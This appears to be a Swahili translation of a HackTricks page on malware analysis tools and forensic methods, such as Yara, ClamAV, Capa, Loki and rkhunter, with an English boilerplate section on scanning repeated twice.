hacktricks/forensics/basic-forensic-methodology/malware-analysis.md

Uchambuzi wa Programu Hasidi

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

• Ikiwa unataka kuona kampuni yako inayotangazwa kwenye HackTricks au kupakua HackTricks kwa muundo wa PDF Angalia MPANGO WA KUJIUNGA!
• Pata swag rasmi wa PEASS & HackTricks
• Gundua Familia ya PEASS, mkusanyiko wetu wa NFTs ya kipekee
• Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye HackTricks na HackTricks Cloud repos za github.

Viongozi vya Uchunguzi

https://www.jaiminton.com/cheatsheet/DFIR/#

Huduma za Mtandaoni

• VirusTotal
• HybridAnalysis
• Koodous
• Intezer
• Any.Run

Zana za Kupambana na Virus na Ugunduzi Nje ya Mtandao

Yara

Sakinisha

sudo apt-get install -y yara

Andaa sheria

Tumia skripti hii kupakua na kuunganisha sheria zote za yara za programu hasidi kutoka kwenye github: https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9
Tengeneza saraka ya sheria na itekeleze. Hii itaunda faili inayoitwa malware_rules.yar ambayo ina sheria zote za yara kwa ajili ya programu hasidi.

wget https://gist.githubusercontent.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9/raw/4ec711d37f1b428b63bed1f786b26a0654aa2f31/malware_yara_rules.py
mkdir rules
python malware_yara_rules.py

Kagua

Malware analysis begins with scanning the suspicious file or system for any signs of malicious activity. This involves using antivirus software, network monitoring tools, and other scanning techniques to identify any indicators of compromise (IOCs) or suspicious behavior. The goal is to detect and isolate any potential malware present in the system.

Antivirus Scanning

Antivirus scanning is a common method used to detect and remove malware. It involves using antivirus software to scan files, directories, and the entire system for known malware signatures. The antivirus software compares the scanned files against a database of known malware signatures and alerts the user if any matches are found.

Network Monitoring

Network monitoring tools can be used to analyze network traffic and identify any suspicious or malicious activity. These tools monitor network packets and analyze their content to detect any signs of malware communication or unauthorized access attempts. Network monitoring can help identify malware that may be attempting to communicate with command and control (C2) servers or exfiltrate data from the system.

File Analysis

File analysis involves examining the suspicious file in detail to identify any malicious behavior or hidden functionality. This can be done using various tools and techniques, such as static analysis and dynamic analysis.

• Static Analysis: Static analysis involves examining the file without executing it. This can include analyzing the file's metadata, examining its structure, and looking for any suspicious or obfuscated code. Static analysis can help identify known malware patterns or indicators of malicious behavior.

• Dynamic Analysis: Dynamic analysis involves executing the file in a controlled environment, such as a virtual machine or sandbox, to observe its behavior. This can include monitoring system calls, network activity, and file modifications. Dynamic analysis can help identify any malicious behavior that may not be evident during static analysis.

Memory Analysis

Memory analysis involves examining the system's memory for any signs of malicious activity. This can include analyzing running processes, loaded modules, and network connections. Memory analysis can help identify malware that may be running in memory or any malicious code injected into legitimate processes.

Registry Analysis

Registry analysis involves examining the system's registry for any signs of malicious activity. The registry is a database that stores configuration settings and other information about the system and its applications. Malware often modifies the registry to achieve persistence or to execute at system startup. Registry analysis can help identify any suspicious or malicious registry entries.

Log Analysis

Log analysis involves examining system logs, such as event logs and application logs, for any signs of malicious activity. Logs can contain valuable information about system events, user activity, and network connections. Analyzing logs can help identify any abnormal or suspicious behavior that may indicate the presence of malware.

Behavioral Analysis

Behavioral analysis involves observing the behavior of the suspicious file or system to identify any malicious activity. This can include monitoring system processes, network connections, file modifications, and other system events. Behavioral analysis can help identify any abnormal or malicious behavior that may not be detected through other analysis techniques.

By performing a thorough scan using these techniques, analysts can gather valuable information about the suspicious file or system and identify any potential malware present. This information can then be used for further analysis and investigation.

yara -w malware_rules.yar image  #Scan 1 file
yara -w malware_rules.yar folder #Scan the whole folder

YaraGen: Angalia kwa zisizo na programu hasidi na Unda sheria

Unaweza kutumia zana YaraGen kuunda sheria za yara kutoka kwa faili ya binary. Angalia mafunzo haya: Sehemu 1, Sehemu 2, Sehemu 3

python3 yarGen.py --update
python3.exe yarGen.py --excludegood -m  ../../mals/

ClamAV

Sakinisha

sudo apt-get install -y clamav

Kagua

Malware analysis begins with scanning the suspicious file or system for any signs of malicious activity. This involves using antivirus software, network monitoring tools, and other scanning techniques to identify any indicators of compromise (IOCs) or suspicious behavior. The goal is to detect and isolate any potential malware present in the system.

Antivirus Scanning

Antivirus scanning is a common method used to detect and remove malware. It involves using antivirus software to scan files, directories, and the entire system for known malware signatures. The antivirus software compares the scanned files against a database of known malware signatures and alerts the user if any matches are found.

Network Monitoring

Network monitoring tools can be used to analyze network traffic and identify any suspicious or malicious activity. These tools monitor network packets and analyze their content to detect any signs of malware communication or unauthorized access attempts. Network monitoring can help identify malware that may be attempting to communicate with command and control (C2) servers or exfiltrate data from the system.

File Analysis

File analysis involves examining the suspicious file in detail to identify any malicious behavior or hidden functionality. This can be done using various tools and techniques, such as static analysis and dynamic analysis.

• Static Analysis: Static analysis involves examining the file without executing it. This can include analyzing the file's metadata, examining its structure, and looking for any suspicious or obfuscated code. Static analysis can help identify known malware patterns or indicators of malicious behavior.

• Dynamic Analysis: Dynamic analysis involves executing the file in a controlled environment, such as a virtual machine or sandbox, to observe its behavior. This can include monitoring system calls, network activity, and file modifications. Dynamic analysis can help identify any malicious behavior that may not be evident during static analysis.

Memory Analysis

Memory analysis involves examining the system's memory for any signs of malicious activity. This can include analyzing running processes, loaded modules, and network connections. Memory analysis can help identify malware that may be running in memory or any malicious code injected into legitimate processes.

Registry Analysis

Registry analysis involves examining the system's registry for any signs of malicious activity. The registry is a database that stores configuration settings and other information about the system and its applications. Malware often modifies the registry to achieve persistence or to execute at system startup. Registry analysis can help identify any suspicious or malicious registry entries.

Log Analysis

Log analysis involves examining system logs, such as event logs and application logs, for any signs of malicious activity. Logs can contain valuable information about system events, user activity, and network connections. Analyzing logs can help identify any abnormal or suspicious behavior that may indicate the presence of malware.

Behavioral Analysis

Behavioral analysis involves observing the behavior of the suspicious file or system to identify any malicious activity. This can include monitoring system processes, network connections, file modifications, and other system events. Behavioral analysis can help identify any abnormal or malicious behavior that may not be detected through other analysis techniques.

By performing a thorough scan using these techniques, analysts can gather valuable information about the suspicious file or system and identify any potential malware present. This information can then be used for further analysis and investigation.

sudo freshclam      #Update rules
clamscan filepath   #Scan 1 file
clamscan folderpath #Scan the whole folder

Capa

Capa inagundua uwezo unaoweza kuwa na nia mbaya katika faili za kutekelezwa: PE, ELF, .NET. Kwa hivyo itapata mambo kama mbinu za Att&ck, au uwezo wenye shaka kama vile:

• angalia kosa la OutputDebugString
• tekeleza kama huduma
• anzisha mchakato

Pata katika repo ya Github.

IOC

IOC inamaanisha Indicator Of Compromise. IOC ni seti ya hali ambazo zinatambua programu isiyo hitajika au programu hasidi iliyothibitishwa. Timu za Blue hutumia aina hii ya ufafanuzi kutafuta faili za aina hii katika mifumo yao na mitandao yao.
Kushiriki ufafanuzi huu ni muhimu sana kwani wakati programu hasidi inatambuliwa kwenye kompyuta na IOC kwa programu hasidi hiyo inaundwa, timu nyingine za Blue zinaweza kuitumia kutambua programu hasidi haraka zaidi.

Zana ya kuunda au kuhariri IOCs ni IOC Editor.
Unaweza kutumia zana kama Redline kutafuta IOCs zilizofafanuliwa kwenye kifaa.

Loki

Loki ni skana ya Viashiria Rahisi vya Uvamizi.
Ugunduzi unategemea njia nne za ugunduzi:

1. File Name IOC
Regex match on full file path/name

2. Yara Rule Check
Yara signature matches on file data and process memory

3. Hash Check
Compares known malicious hashes (MD5, SHA1, SHA256) with scanned files

4. C2 Back Connect Check
Compares process connection endpoints with C2 IOCs (new since version v.10)

Linux Malware Detect

Linux Malware Detect (LMD) ni skanari wa programu hasidi kwa ajili ya Linux iliyotolewa chini ya leseni ya GNU GPLv2, ambayo imeundwa kuzingatia vitisho vinavyokabiliwa katika mazingira ya kuhudhuria pamoja. Inatumia data ya vitisho kutoka kwa mifumo ya udukuzi wa pembe ya mtandao ili kuchunguza programu hasidi ambayo inatumika kwa shambulio na kuzalisha saini za kugundua. Aidha, data ya vitisho pia hutokana na michango ya watumiaji na rasilimali za jamii ya programu hasidi.

rkhunter

Zana kama rkhunter inaweza kutumika kuangalia mfumo wa faili kwa uwezekano wa rootkits na programu hasidi.

sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--skip-keypress]

FLOSS

FLOSS ni zana ambayo itajaribu kupata herufi zilizofichwa ndani ya faili za kutekelezwa kwa kutumia njia tofauti.

PEpper

PEpper inachunguza mambo ya msingi ndani ya faili ya kutekelezwa (data ya binary, entropy, URLs na IPs, baadhi ya sheria za yara).

PEstudio

PEstudio ni zana ambayo inaruhusu kupata habari za faili za kutekelezwa za Windows kama vile uingizaji, utoaji, vichwa, lakini pia itachunguza virusi vya jumla na kupata mbinu za udukuzi zinazowezekana.

Detect It Easy(DiE)

DiE ni zana ya kugundua ikiwa faili imefichwa na pia kupata wafungaji.

NeoPI

NeoPI ni skripti ya Python ambayo hutumia njia mbalimbali za takwimu kugundua maudhui yaliyofichwa na yaliyofichwa ndani ya faili za maandishi/skripti. Lengo la NeoPI ni kusaidia katika ugunduzi wa nambari ya kabati ya wavuti iliyofichwa.

php-malware-finder

PHP-malware-finder inafanya kazi yake vizuri kabisa kugundua nambari iliyofichwa/isiyoaminika pamoja na faili zinazotumia kazi za PHP mara nyingi hutumiwa katika programu hasi/nyavu za wavuti.

Apple Binary Signatures

Unapochunguza sampuli fulani ya malware unapaswa daima kagua saini ya faili ya binary kwani mwandishi aliyetia saini tayari anaweza kuwa husiana na malware.

#Get signer
codesign -vv -d /bin/ls 2>&1 | grep -E "Authority|TeamIdentifier"

#Check if the app’s contents have been modified
codesign --verify --verbose /Applications/Safari.app

#Check if the signature is valid
spctl --assess --verbose /Applications/Safari.app

Mbinu za Uchunguzi

Kupangilia Faili

Ikiwa unajua kwamba folda fulani inayohifadhi faili za seva ya wavuti ilisasishwa mwisho tarehe fulani. Angalia tarehe ambayo faili zote katika seva ya wavuti ziliumbwa na kuhaririwa na ikiwa tarehe yoyote ni ya kushuku, angalia faili hiyo.

Viwango vya Msingi

Ikiwa faili za folda hazipaswi kuhaririwa, unaweza kuhesabu hash ya faili za asili za folda na kulinganisha na zile za sasa. Kitu chochote kilichohaririwa kitakuwa cha kushuku.

Uchambuzi wa Takwimu

Wakati habari inahifadhiwa kwenye magogo, unaweza angalia takwimu kama mara ngapi kila faili ya seva ya wavuti ilipatikana kwa sababu web shell inaweza kuwa moja ya mara nyingi.

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks:

• Ikiwa unataka kuona kampuni yako inatangazwa kwenye HackTricks au kupakua HackTricks kwa muundo wa PDF Angalia MPANGO WA KUJIUNGA!
• Pata swag rasmi wa PEASS & HackTricks
• Gundua The PEASS Family, mkusanyiko wetu wa NFTs za kipekee
• Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa HackTricks na HackTricks Cloud github repos.